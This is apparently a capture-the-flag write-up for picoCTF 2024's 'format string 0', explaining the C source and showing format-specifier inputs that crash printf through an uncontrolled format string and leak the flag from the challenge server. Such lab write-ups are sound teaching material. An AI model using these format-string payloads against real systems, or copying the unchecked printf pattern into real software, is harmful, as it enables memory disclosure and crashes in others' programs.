Level: Easy
Tags: picoCTF 2024, Binary Exploitation, format_string, browser_webshell_solvable
Author: CHENG ZHANG
Description:
Can you use your knowledge of format strings to make the customers happy?
Download the binary here.
Download the source here.
Connect with the challenge instance here:
nc mimas.picoctf.net 58598
Hints:
1. This is an introduction of format string vulnerabilities. Look up "format specifiers"
if you have never seen them before.
2. Just try out the different options
Challenge link: https://play.picoctf.org/practice/challenge/433
We start by analysing the rather long C source code. First the main function.
int main(int argc, char **argv){
FILE *f = fopen("flag.txt", "r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
fgets(flag, FLAGSIZE, f);
signal(SIGSEGV, sigsegv_handler);
gid_t gid = getegid();
setresgid(gid, gid, gid);
serve_patrick();
return 0;
}Main basically does the following:
- Make sure there is a
flag.txtfile available, - Sets up a signal handler for
SIGSEGV(Invalid memory references) - Sets permissions (user and group IDs) with
setresgid - Calls the
serve_patrickfunction
If an invalid memory reference happens the sigsegv_handler function is called
void sigsegv_handler(int sig) {
printf("\n%s\n", flag);
fflush(stdout);
exit(1);
}and will display the flag for us.
Let's skip the rest of the source code for now and try out the binary.
Next, we run the binary
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Binary_Exploitation/format_string_0]
└─$ ./format-string-0
Please create 'flag.txt' in this directory with your own debugging flag.
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Binary_Exploitation/format_string_0]
└─$ echo "picoCTF{fake_flag}" > flag.txt
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Binary_Exploitation/format_string_0]
└─$ ./format-string-0
Welcome to our newly-opened burger place Pico 'n Patty! Can you help the picky customers find their favorite burger?
Here comes the first customer Patrick who wants a giant bite.
Please choose from the following burgers: Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe
Enter your recommendation: Gr%114d_Cheese
Gr 4202954_Cheese
Good job! Patrick is happy! Now can you serve the second customer?
Sponge Bob wants something outrageous that would break the shop (better be served quick before the shop owner kicks you out!)
Please choose from the following burgers: Pe%to_Portobello, $outhwest_Burger, Cla%sic_Che%s%steak
Enter your recommendation: Cla%sic_Che%s%steak
picoCTF{fake_flag}
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Binary_Exploitation/format_string_0]
└─$ Of the choices I chose Gr%114d_Cheese and Cla%sic_Che%s%steak because the both contains format specifiers which will cause the program to remove additional items on the stack and cause an invalid memory reference.
The vulnerabilities are in the printf calls without one or more format specifiers, i.e.
- The line
int count = printf(choice1);in theserve_patrickfunction and - The line
printf(choice2);in theserve_bobfunction
Finally, we connect to the site vith netcat and gives the same answers to get the real flag
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Binary_Exploitation/format_string_0]
└─$ nc mimas.picoctf.net 58598
Welcome to our newly-opened burger place Pico 'n Patty! Can you help the picky customers find their favorite burger?
Here comes the first customer Patrick who wants a giant bite.
Please choose from the following burgers: Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe
Enter your recommendation: Gr%114d_Cheese
Gr 4202954_Cheese
Good job! Patrick is happy! Now can you serve the second customer?
Sponge Bob wants something outrageous that would break the shop (better be served quick before the shop owner kicks you out!)
Please choose from the following burgers: Pe%to_Portobello, $outhwest_Burger, Cla%sic_Che%s%steak
Enter your recommendation: Cla%sic_Che%s%steak
ClaCla%sic_Che%s%steakic_Che(null)
picoCTF{<REDACTED>}
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Binary_Exploitation/format_string_0]
└─$ For additional information, please see the references below.